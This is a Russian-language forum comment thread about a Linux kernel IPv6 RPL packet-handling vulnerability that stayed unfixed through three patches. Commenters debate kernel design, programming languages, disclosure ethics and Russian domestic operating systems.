     ....большая нить свёрнута, показать (41)

  • 1.5, Аноним (5), 09:58, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    >за прошедшие 15 месяцев три раза попытались устранить >проблему, выпустив патчи в сентябре 2022 , октябре 2022 и >апреле 2023 года, но каждый раз исправлений оказывалось >недостаточно и уязвимость удавалось воспроизвести. В конечном >счёте проект ZDI, координировавший работу по устранению >уязвимости, принял решение раскрыть детальную информацию

    Видимо "диды" понимавшие в Ц и в ИП стэк начали заканчиваться, наступает эра трехтомника документированных, но не исправленных ошибок.

     
     
  • 2.22, Аноним (22), 10:28, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    те самые диды, которые подкинули нам cleartext DNS, чтоб провайдеру было легче стучать органам, даже при использовании HTTPS? да, спасибо за это дидам
     
     
  • 3.23, Аноним (23), 10:30, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    DNS тоже поверх SSL бывает
     
     
  • 4.33, Аноним (22), 10:40, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +6 +/
    согласно дидам, DNS - это всегда клиртекст на порту 53. DOH, DNSCrypt - это то, что придумал молодняк в ответ на свиньи, заботливо подложенные дидами.
     
     
  • 5.46, Аноним (46), 10:57, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Может ещё вместо текстового HTML надо было использовать бинарный стандарт? Это же было бы так экономно.
     
     
  • 6.54, Аноним (51), 11:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Давно пора.
     
  • 6.97, Аноним (97), 12:59, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    так и есть при использовании gzip и прочих сжимальщиков настроенных на серваках
     
     
  • 7.128, Аноним (128), 15:18, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ага ещё один любить нагревать атмосферу своими сжиманиями разжиманиями. Ты вообще понимаешь что такое бинарный формат?
     
  • 6.115, Аноним в чайнике (?), 14:21, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Надо было. Внезапно, получилось бы не хуже, и, глядишь, любимый опеннет бы грузился ещё на пару миллисекунд быстрее
     
     
  • 7.127, 1 (??), 15:18, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    оставьте уже дидов ...
    На кол тех, кто выдумал XML И JSOn !!! Необходим пожатый бинарный поток !
     
     
  • 8.129, Аноним (128), 15:19, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Я тебя немного удивлю есть полно стандартизованных бинарных форматов никто ими о... текст свёрнут, показать
     
     
  • 9.141, 1 (??), 16:12, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ы Например IP протокол, раз ты такой умный - прекрасно им все пользуются... текст свёрнут, показать
     
  • 9.223, Аноним (-), 01:36, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да, блин Даже TLS в HTTPS так то ни разу не текстовый И вот прям на опеннетике... текст свёрнут, показать
     
  • 5.203, nuclight (ok), 23:28, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Не гони на нас, мы и DNSCurve придумали!
     
  • 3.72, Аноним (72), 11:55, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ну был бы бинарным, и что, его нельзя было бы распарсить? Да там наоборот, все было бы еще проще в плане затрат.
     
  • 3.95, Аноним (95), 12:55, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    DNS и так принадлежит провайдеру, если ты пользуешься DNS в доверенное место отдельно от канала - ты сам себе злобный буратино.
     
     
  • 4.111, шмякшмяк (?), 14:07, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    То есть использование криптоднс в браузере хуже если исползовать простой резолвер?
     
     
  • 5.114, Аноним (108), 14:18, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Конечно, хуже для майора.
     
  • 3.290, ПГМ в стадии ПСМ (?), 23:10, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А вам есть что скрывать?? Проверьте совесть и покайтесь...
     
  • 2.25, Аноним (31), 10:33, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +5 +/
    "Диды понимавшие в Ц" насажали уже тысячи таких packet-of-death.
     
     
  • 3.221, Аноним (-), 01:30, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > "Диды понимавшие в Ц" насажали уже тысячи таких packet-of-death.

    В линухе по моему и десятка за все время не наберется. Ну а остальные придерживались тактики "не ошибается тот кто ничего не делает" в основном.

     

  • 1.7, Аноним (7), 10:07, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    > но каждый раз исправлений оказывалось недостаточно и уязвимость удавалось воспроизвести

    Расскажите уже кто-нибудь этим разработчикам ядра про unit-тестирование.

     
     
  • 2.12, Бывалый смузихлёб (?), 10:11, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    тут и просто тестирования хватило бы
     
  • 2.14, полуфрактал (?), 10:12, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    деды не знают этих хипсторских вещей, но мы знаем какой язык корректно бы обработал это поведение
     
     
  • 3.44, Аноним (46), 10:53, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Воображаемый святой язык на котором говорит ChatGPT.
     
  • 3.84, FF (?), 12:16, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    поведение бы обработал теоретически, т.к. если ходить вокруг да около -- сложные проекты не будут доведены до конца или закончатся на этапе инициативы
     
  • 3.117, Аноним (108), 14:27, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, также корректно бы завершил процесс... ядра.
     
  • 3.134, Аноним (7), 15:37, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Деды всё знают https://www.kernel.org/doc/html/latest/dev-tools/kunit/index.html Это хипстеры не в курсе.
     

  • 1.13, Бывалый смузихлёб (?), 10:12, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +7 +/
    > за прошедшие 15 месяцев три раза попытались устранить проблему,
    > выпустив патчи, но каждый раз исправлений оказывалось недостаточно
    > и уязвимость удавалось воспроизвести

    это значит что это не баг и не ошибка - это именно целенаправленно созданная дыра, о чём разработчики знали и делали вид активной работы по исправлению, чтобы обнаружившие дыру успокоились и пошли дальше

     
     
  • 2.17, лютый арчешкольник (?), 10:21, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > sysctl -a | grep -i rpl_seg_enabled

    нет, это какая-то ненужная фигня, которая выключена и на десктопах и на серверах и в опенврт-подобном.

    как понимаю, разрабы фикс делали, а тестить фикс было лень.

     
     
  • 3.91, Я (??), 12:36, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    и некому потому что никто не пользуется фичей..
     

  • 1.16, Карлос Сношайтилис (ok), 10:17, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +17 +/
    Почему при обработке _внешних данных_ ядро уходит в панику? Внешние данные априори ненадёжны и их некорректность — нормальная ситуация, которая не должна вызывать сбоев.

    Это прям как: позвонили в дверь, посмотрел в глазок, не узнал, застрелился.

     
     
  • 2.19, Аноним (19), 10:24, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Почему при обработке _внешних данных_ ядро уходит в панику?

    потому что skb_push никогда не возвращает ошибку

    https://elixir.bootlin.com/linux/v6.3.2/source/net/core/skbuff.c#L2343

    соответственно весь код никогда не проверяет возвращаемое значение. Для скорости наверно.

     
     
  • 3.30, Карлос Сношайтилис (ok), 10:36, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Вы говорите о реализации, я же — об архитектуре.

    Линус постоянно топит о том, что "нехватка памяти, некорректные данные — это нормально, всё должно быть обработано штатно, это ядро, оно не должно останавливаться".

     
     
  • 4.47, Аноним (19), 10:58, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Вы говорите о реализации, я же — об архитектуре.

    в этом случае посчитали что лучше ядро остановить в вырожденных случаях чем снижать скорость в бутылочном горлышке.

     
     
  • 5.61, n00by (ok), 11:34, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Так проверка там делается, надо бы её вообще убрать, если уж так важна скорость. Упадёт когда-нибудь в другом месте.)
     
     
  • 6.66, Аноним (19), 11:44, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Так проверка там делается, надо бы её вообще убрать, если уж так важна скорость.

    нет, учи логику, и конечно скорость важна - сетевой стек работает в контексте softirq

     
     
  • 7.76, n00by (ok), 12:01, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> Так проверка там делается, надо бы её вообще убрать, если уж так важна скорость.
    > нет

    if (unlikely(skb->data < skb->head))
    skb_under_panic(skb, len, __builtin_return_address(0));

    > учи логику, и конечно скорость важна - сетевой стек работает в
    > контексте softirq

    Логику? Ты гуглпереводчик используешь? Или не дочитал моё сообщение?

     
     
  • 8.85, Аноним (19), 12:16, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    ты разницу между обнаружением ошибки и её обработкой понимаешь ... текст свёрнут, показать
     
     
  • 9.257, n00by (ok), 11:26, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Понимаю Как и понимаю чем снижать скорость в бутылочном горлышке ... текст свёрнут, показать
     
  • 5.321, Карлос Сношайтилис (ok), 09:06, 29/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    То есть, у нас есть ядро, которое может крутиться на сервере с сотнями ядер, террабайтами оперативки и тысячами виртуальных машин.

    И что же нам выбрать: упасть на редком сетевом пакете с полной потерей всех данных рилтайма или задействовать одну (!) элементарную инструкцию процессора в бутылочном горлышке?

    Ответ очевиден: надо падать!

    Отличный выбор!

     
  • 3.62, ИмяХ (?), 11:37, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >>Для скорости

    "поспешишь - людей насмешишь"(c)
    С таким подходом можно тогда всю графику в ядро запихать, а потом ловить баги, когда при определённом сочетании пикселей в картинке ядро в панику уходит.

     
     
  • 4.77, Рустик (?), 12:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Всю это что? Фреймбуффер, drm и так в ядре - этого уже достаточно чтобы видосики крутить например в полный экран через ffmpeg, или приложеньку для киоска запустить.
     
  • 4.197, Аноним (206), 22:51, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –2 +/
    В Windows графический интерфейс в ядре. Пользователи довольны скоростью. В серверных платформах он не нужен. Мало того есть Core. Что не так, кроме того, что здесь это вечный оффтопик.
     
  • 2.26, Stax (ok), 10:33, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Потому что для этого нужно микроядро и обработка TCP-стэка с меньшими привилегия... большой текст свёрнут, показать
     
     
  • 3.195, Аноним (206), 22:40, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вынеся все что "не нужно" за пределы повышенных привилегий, мы сделаем это более уязвимым.
     
  • 3.224, Аноним (-), 01:41, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Потому что для этого нужно микроядро и обработка TCP-стэка с меньшими привилегиями,
    > чем системные, чтобы у него не было возможности модифицировать никакие другие
    > структуры ядра, и с возможностью его перезапустить

    А потом, попытавшись это все запустить на каком-нибудь всего-то 100 Гбит интерфейсе (уже и больше есть), подивимся перфомансу чудному, показывающему почему именно микроядра не взлетели. Ну а вы там на своем локалхосте хоть редокс можете гонять, там и микроядра и безопасТный яп, все такое. Да и если этот локалхост вообще сдохнет - кто-то разницу заметит?

     
     
  • 4.284, Аноним (214), 19:07, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> Что не то чтобы невозможно, но потери эффективности на большую загрузку процессора / большие задержки / меньшую пропускную способность из-за дополнительных переключений контекста
    > А потом, попытавшись это все запустить на каком-нибудь всего-то 100 Гбит интерфейсе
    > (уже и больше есть), подивимся перфомансу чудному [...] Ну а вы там на своем локалхосте хоть редокс можете гонять, там и микроядра и безопасТный яп, все такое.

    Угадай по пафосному бреду и фантазиям Балаболку-Нечитателя-294 ...

     
  • 2.27, Аноним (31), 10:33, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Действительно, почему сделано плохо, а не сделано сразу хорошо?
     
  • 2.196, Аноним (206), 22:47, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ошибку сегментации никто не отменял. Это целостность данных или кода. Либо система отслеживает это, либо это не система. Выход за пределы С не отслеживает, а rust отслеживает. Rust предоставляет это возможность. Воспользуется ли ей программист?  
     
     
  • 3.216, Аноним (216), 00:25, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если он не воспользовался статическим анализатором кода и проигнорировал банальные варнинги, то можно ожидать что он напортачит и в любом другом языке.
     
  • 3.322, Карлос Сношайтилис (ok), 09:11, 29/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да чорд с ней с сегментацией (это важно, конечно, но не в контексте данной проблемы), просто меня поражает, что выбор между вариантами "надёжно, но медленно, потом сделаем быстрее" и "может в любой момент упасть, зато быстро, должно проканать", выбрали второй.
     

  • 1.21, n00by (ok), 10:28, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    """
    В 2022 году нашёлся повод потратить пару часов и составить вот такую картинку.

    https://s3r.ru/wp-content/uploads/2023/03/statya-yaos-2023-3-odt_html_359192d3
    несколько уязвимостей повышения полномочий в Linux и их просачивание в Astra Linux SE

    Из неё следует, что на протяжении почти 15 лет (с 2008 по 2022) можно было поднять полномочия обычного пользователя до администратора (root) в широком спектре линукс-дистрибутивов, если знать, как это сделать.

    ...

    С данной картинкой автор пытался выступить на российской конференции «OS DAY 2022», которая была как раз посвящена «технологическим основам безопасных операционных систем». Оргкомитет (в котором присутствовали представители аж трёх российских дистрибутивов Линукса), почему-то счёл доклад не соответствующим тематике конференции.
    """

    https://s3r.ru/stavka-tolko-na-linuks-eto-oshibka/

     
     
  • 2.32, Ответьте на вопрос (?), 10:38, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +2 +/
    ахах спасибо поржал над этим решеетом в который раз
     
     
  • 3.34, n00by (ok), 10:43, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    В Windows технологических отверстий не меньше.
     
     
  • 4.37, Анонин (?), 10:46, 17/05/2023 Скрыто ботом-модератором     [к модератору]
  • +4 +/
     
  • 3.225, Аноним (-), 01:42, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > ахах спасибо поржал над этим решеетом в который раз

    Написано же Special Edition. Специальный дистр, специально для участников Специальной олимпиады.

     
  • 2.40, Аноним (5), 10:49, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ггг, не линуксы гнобил :)
    Надо было на примере редхата показывать ;)
     
     
  • 3.53, n00by (ok), 11:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    По ссылке написано про ядро в целом. Автор приводит доводы, почему это очень похоже на троянского коня.
     
  • 2.60, Аноним (19), 11:33, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > https://s3r.ru/stavka-tolko-na-linuks-eto-oshibka/

    для астры всё же что-то делали для проверки безопасности

    https://www.ispras.ru/projects/astraver_toolset/

    он там пишет что раз есть картинки то лучше не Linux использовать а Windows написать чтобы не портировать непортируемые виндо-поделки. Мягко говоря спорное утверждение - безопасность Linux-систем можно кардинально улучшить без переписвания

    https://genode.org/

     
     
  • 3.64, n00by (ok), 11:39, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Он там пишет, что делать должны доверенные люди, а не вероятный противник. В Астре именно потому вместо SELinux писали своё.
     
     
  • 4.69, Аноним (19), 11:51, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Он там пишет, что делать должны доверенные люди, а не вероятный противник.

    а ты читал на что ссылки даёшь ?

    > Спрашивается, проводил ли кто-нибудь подсчёты этой стоимости? А также, сравнивалась ли стоимость переписывания программ со стоимостью создания Windows-совместимой ОС, в которой эти программы просто будут работать? Давайте я это сделаю: мы только что прикинули, что 1,5 миллиона человеко-лет потребуется на перенос приложений.

     
     
  • 5.73, n00by (ok), 11:56, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Естественно, читал Если бы ты сам дочитал, то увидел бы мой комментарий Сп... большой текст свёрнут, показать
     
     
  • 6.94, Аноним (94), 12:55, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Что это за бред и при чём тут линукс? В данной цитате приведён какой-то высер какой-то невменяшки, религиозные догмы у неё какие-то.
     
     
  • 7.258, n00by (ok), 11:31, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Бред - это медицинский термин. Вы ошиблись адресом, конференция медиков вон там.

    Здесь ожидается, что появится специалист с опытом, покажет расчёты трудозатрат... ;)

     
  • 6.104, Аноним (19), 13:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Естественно, читал.

    но ведь там прямо написано что надо клон винды писать с нуля а не использовать Linux. Даже не знаю что творится у него в голове - почему-то переписать Компас "за наши с вами деньги" с винапи на линуксапи это плохо, а написать винду вместо использования wine хорошо. Обоснования просто сказочное - нас же до.уя.

     
     
  • 7.259, n00by (ok), 11:36, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    "Клон Винды" в тексте отсутствует, это лишь Ваша интерпретация, как вы поняли статью. Смысл там в том, что в сумме (с учётом переписывания имеющегося ПО) может оказаться дешевле обеспечить совместимость на уровне WinAPI. Например, FreeBSD + WinE. Или старое ядро Linux + WinE.
     
     
  • 8.307, Имя (?), 13:09, 22/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Не может Это заведомо позиция отстающего Встать и идти за кем-то, повторяя его... текст свёрнут, показать
     
     
  • 9.308, n00by (ok), 15:57, 22/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Покажете свой гитхап, или очередной мастер писать прорывные словесы ... текст свёрнут, показать
     
     
  • 10.319, Аноним (-), 16:53, 24/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Такие линии поведения ведут к неудобным вопросам Ну вот например что с лично в... текст свёрнут, показать
     
     
  • 11.320, n00by (ok), 07:09, 25/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Это вполне удобный для меня вопрос, поскольку задан анонимно, что бы ни к чему з... текст свёрнут, показать
     
  • 6.107, Ананий (?), 13:46, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    >оценку трудоёмкости Линукса

    всегда было интересно, чому свет клином не сошелся и нужен именно переусложненный линукс?
    чому не гораздо более простая FreeBSD. Что там принципиально настолько необходимо в этих ваших линуксах?

    Под какие _практические_ задачи она не подойдет? запускать мульон доскеров на одном старом ксеоне с алишечки?

     
     
  • 7.120, Че769 (?), 14:35, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    FreeBSD доминировала в начале нулевых, пока они не начали чудить с лицензиями в предвкушении ещё большей славы или блабла. Тогда все быстро сбежали на линуксы и обратно уже не вернутся. Реванша не будет.
     
     
  • 8.204, nuclight (ok), 23:31, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    И в чем же заключалось чудить с лицензиями ... текст свёрнут, показать
     
  • 7.124, Аноним (19), 15:10, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Под какие _практические_ задачи она не подойдет?

    под любые практические задачи проще использовать Linux, а для разработки электроники Linux безальтернативен

     
     
  • 8.226, Аноним (-), 01:45, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да и для всякой околоэмбедовки Чтобы там бсд завести надо быть корпом размером ... текст свёрнут, показать
     
  • 7.260, n00by (ok), 11:38, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Вот кстати, да. Основная проблема FreeBSD преподносится как "нет драйверов". Но у нас же импортозамещение, два процессора Эльбрус и Байкал, плюс три совместимых устройства. Для них драйвера пишет производитель.
     
  • 4.232, Аноним (278), 01:57, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Осталось разобраться кто будет писать, и как гарантировать, что не выйдет худе, чем в Линуксе. А то неровен час окажется, что талантливых русскоязычных программистов-патриотов раз, два и обчёлся, да и те предпочитают за доллары на редхат работать за границей, как это водится у патриотов.
     
     
  • 5.264, n00by (ok), 11:51, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Людей найти можно. Вопрос в том, что придётся конкурировать с разжиревшими продавцами халявных исходников.
     
     
  • 6.279, Аноним (278), 16:15, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А, делов-то. Пустяки. К понедельнику управишься, фантазёр?
     
     
  • 7.295, n00by (ok), 10:14, 19/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Аноним, ну зачем ты так с собой? Из твоей попытки троллинга я понял, что никто никогда не вёл с тобой дел серьёзнее, чем послать за пиццей.
     
  • 2.99, Аноним (99), 13:03, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Честно говоря, график немного странный. Насколько я понимаю, нанесено не время существования уязвимостей в паблике, а в принципе время их существования в кодовой базе. В таком случае в Windows (или в принципе в проекте с огромной кодовой базой) тоже можно найти уязвимости, которые покрывали весь или почти весь срок жизни нескольких версий ОС.
    Т.е. по сути своей, этот график горит только о том, что в ПО существуют ошибки и что некоторые из них не обнаруживаются годами, а то и десятилетиями.
     
     
  • 3.262, n00by (ok), 11:47, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    А кому интересен "паблик"? Ценность представляет "зиродей".
     
  • 2.133, Аноним (108), 15:30, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Главный посыл статьи - лучше создать Windows-совместимую ОС. А что же не оботечествили и не обсуверенили ReactOS? А, не на русском Обероне потому что.
    "Идейный глобализм во многом свойственен программистам вообще, поэтому патриотично мыслящие программисты нуждаются в охране, как снежный барс или ландыши. Русский язык вызывает у глобалистов стойкую аллергию, поэтому он является фильтром (не идеальным, но и не плохим) для того, чтобы глобалисты не захватили проект и не сменили его цели. Глобалисты просто изначально не пойдут в такой проект и это даст патриотам численный перевес хотя бы внутри коллектива разработчиков." Это не тот прогер, что пишет РусскуюОС?
     
     
  • 3.263, n00by (ok), 11:48, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Например у меня не вышло с клоном ReactOS, потому что было мало людей и снежный ком на голову упал. А Вы просто потролить хотели, да?
     
  • 2.139, Аноним (108), 15:58, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В дополнение к ОС на языке Эль-76 https://www.cnews.ru/news/top/2023-05-02_v_rossii_poyavitsya_suverennyj
     
     
  • 3.267, n00by (ok), 12:38, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    В непринятых новостях читайте ответ Максима.
     
  • 2.162, Аноним (162), 18:09, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Я прочитал эту с статью и с удивлением не обнаружил в ней главной проблемы с без... большой текст свёрнут, показать
     
     
  • 3.185, Аноним (184), 21:42, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Если ты зарабатываешь на починке своего продукта, то тебе никогда не выгодно чтобы он просто работал из коробки сам от начала и до конца.

    Ты случайно не про 1С пишешь :)

     
  • 3.219, Аноним (219), 01:20, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Линукс разрабатывают не коммунисты , а анархисты Причем половина - левые леб... большой текст свёрнут, показать
     
     
  • 4.227, Аноним (-), 01:49, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > - правые щукины дети. Потому иногда получается немного раком.

    Но поскольку остальные не смогли и так...  попался тут как-то анализ. Лебедь тянет вверх, и уж точно не мешает процессу, снижая трение и все такое. А суммарный вектор тяги рака и щуки скорее всего не нулевой. Ну вот оно и ездит себе, ко всеобщему облому. Такая вот разница между тем что там вообразили себе носители баек и тем что происходит на самом деле.

     
  • 3.268, n00by (ok), 12:52, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Понимают ли это местные франчайзи Если понимают, получается, они перепродают за... большой текст свёрнут, показать
     
     
  • 4.292, Аноним (162), 00:37, 19/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Размещайте, если хотите, я сам попытался, но только там "Ошибка 500" на сайте и комментарии не оставляются...
     
  • 2.189, Аноним (206), 22:17, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Не понял причем тут Астра? Существовала давняя уязвимость. В один момент она была обнаружена и был выпущен патч. У Вас есть сведения, что он был проигнорировал службой дистрибутива Астра?
     
     
  • 3.265, n00by (ok), 11:57, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > У Вас есть сведения, что
    > он был проигнорировал службой дистрибутива Астра?

    Поставив вопрос таким образом, Вы дали мне право попросить Вас дать голову на отсечение, что до публикации уязвимости она не эксплуатировалась.

     

     ....большая нить свёрнута, показать (42)

  • 1.36, Анонимусс (?), 10:45, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/
    - return (n * IPV6_PFXTAIL_LEN(cmpri)) + IPV6_PFXTAIL_LEN(cmpre);
    + return sizeof(struct ipv6_rpl_sr_hdr) + (n * IPV6_PFXTAIL_LEN(cmpri)) +
    +    IPV6_PFXTAIL_LEN(cmpre);

    За три попытки не смогли правильно посчитать размер буфера...
    Забавно))

     
     
  • 2.42, Аноним (5), 10:51, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Мир изменился, теперь размеры буферов должны считать Rust, Mojo и GPT
     
     
  • 3.55, Аноним (94), 11:22, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Только беда в том, что они делают это не бесплатно, а производительности и так недостаточно. Поэтому "любители" Rust, Mojo и GPT будут и дальше сидеть в луже.
     
     
  • 4.323, Карлос Сношайтилис (ok), 09:29, 29/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Да, не бесплатно, компиляция заметно дольше, чем С, но зато надёжнее в проде.
     
  • 3.58, Аноним (58), 11:27, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    И будут они у вас либо выделять постоянно больше, чем на самом деле надо (что тоже может привести к проблемам), либо постоянно вызывать realloc. Спасибо, нафиг надо
     
     
  • 4.71, Анонимусс (?), 11:54, 17/05/2023 Скрыто ботом-модератором     [к модератору]
  • –1 +/
     
  • 4.229, Аноним (-), 01:51, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > И будут они у вас либо выделять постоянно больше, чем на самом деле надо

    ...и при том метана.

    > (что тоже может привести к проблемам)

    Еще каким, это мощнейший парниковый газ, в десятки раз хуже CO2!

     
  • 3.190, Аноним (206), 22:27, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Откуда компилятор знает что туда Впритык запихает программист? rustc может выдать исключение или ошибку, что буфер маловат во время "вталкивания", когда уже места нет.
     
  • 2.194, Аноним (206), 22:36, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Просто не определились, что пихать будут )
     

  • 1.79, Вы забыли заполнить поле Name (?), 12:08, 17/05/2023 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > принял решение раскрыть детальную информацию об уязвимости, не дожидаясь появления работающего исправления в ядре

    Непрофессионально поступили

     
     
  • 2.165, YetAnotherOnanym (ok), 18:18, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Непрофессионально поступили

    Аполитично, не побоюсь этого слова.

     
  • 2.191, Аноним (206), 22:28, 17/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    Ну значит цели были иные.
     
  • 2.275, Аноним (275), 13:33, 18/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    > Непрофессионально поступили

    Как раз профессионально - сообщили о проблеме втихую, дождались исправления (даже трёх), опубликовали информацию. Вроде всё по канонам. Нет?

     
     
  • 3.298, Вы забыли заполнить поле Name (?), 21:49, 19/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >> Непрофессионально поступили
    > Как раз профессионально - сообщили о проблеме втихую, дождались исправления (даже трёх),
    > опубликовали информацию. Вроде всё по канонам. Нет?

    Нет, уязвимость не была закрыта.

     
     
  • 4.300, n00by (ok), 10:55, 20/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >>> Непрофессионально поступили
    >> Как раз профессионально - сообщили о проблеме втихую, дождались исправления (даже трёх),
    >> опубликовали информацию. Вроде всё по канонам. Нет?
    > Нет, уязвимость не была закрыта.

    Если трёх исправлений для закрытия недостаточно, значит впору ставить под сомнение профпригодность и проинформировать пользователей.

     
     
  • 5.301, Вы забыли заполнить поле Name (?), 22:06, 20/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >>>> Непрофессионально поступили
    >>> Как раз профессионально - сообщили о проблеме втихую, дождались исправления (даже трёх),
    >>> опубликовали информацию. Вроде всё по канонам. Нет?
    >> Нет, уязвимость не была закрыта.
    > Если трёх исправлений для закрытия недостаточно, значит впору ставить под сомнение профпригодность
    > и проинформировать пользователей.

    Это внутренняя кухня, а пользователи в этом не виноваты. В результате они получили уязвимость. Проинформировать можно было и после закрытия уязвимости.

     
     
  • 6.302, n00by (ok), 08:46, 21/05/2023 [^] [^^] [^^^] [ответить]  
  • +/
    >>>>> Непрофессионально поступили
    >>>> Как раз профессионально - сообщили о проблеме втихую, дождались исправления (даже трёх),
    >>>> опубликовали информацию. Вроде всё по канонам. Нет?
    >>> Нет, уязвимость не была закрыта.
    >> Если трёх исправлений для закрытия недостаточно, значит впору ставить под сомнение профпригодность
    >> и проинформировать пользователей.
